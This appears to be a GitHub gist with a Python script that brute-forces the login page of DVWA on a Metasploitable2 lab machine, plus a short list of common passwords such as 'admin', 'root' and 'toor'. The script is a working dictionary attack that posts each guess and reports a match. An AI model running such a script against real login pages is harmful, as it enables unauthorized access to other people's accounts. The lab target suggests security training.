Created
March 10, 2020 17:12
-
-
Save davidlares/12a222fb66350a6f4fbb61ea2a0e427c to your computer and use it in GitHub Desktop.
Bruteforcing Metasplotaible2's DVWA login-page Script w/ known pass-list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # a good password list (In Kali): /usr/share/wordlists/metasploit/rockyou.txt | |
| import requests | |
| def bruteforcer(username, url): | |
| for password in passwords: | |
| password = password.strip() | |
| print("[!] Bruteforcing with password: %s" % password) | |
| # generating dictionary (key (form name value) - username as value = whatever set on input) | |
| data_dict = {"username": username, "password": password, "Login": "submit"} | |
| # generating request | |
| response = requests.post(url, data=data_dict) | |
| # checking if failed | |
| if "Login failed" in response.content: | |
| pass | |
| else: | |
| print("[!] Found") | |
| print("[+] Username: %s" % username) | |
| print("[+] Password: %s" % password) | |
| if __name__ == "__main__": | |
| url = "http://192.168.2.105/dvwa/login.php" | |
| # setting up the username to bruteforce | |
| username = raw_input("[+] Enter username: ") | |
| # open the password list file | |
| with open("passwordlist.txt", "r") as passwords: | |
| bruteforcer(username, url) | |
| print("[!] Process Done") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hello | |
| 1234 | |
| root | |
| admin | |
| toor | |
| password123 | |
| 123password | |
| password |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment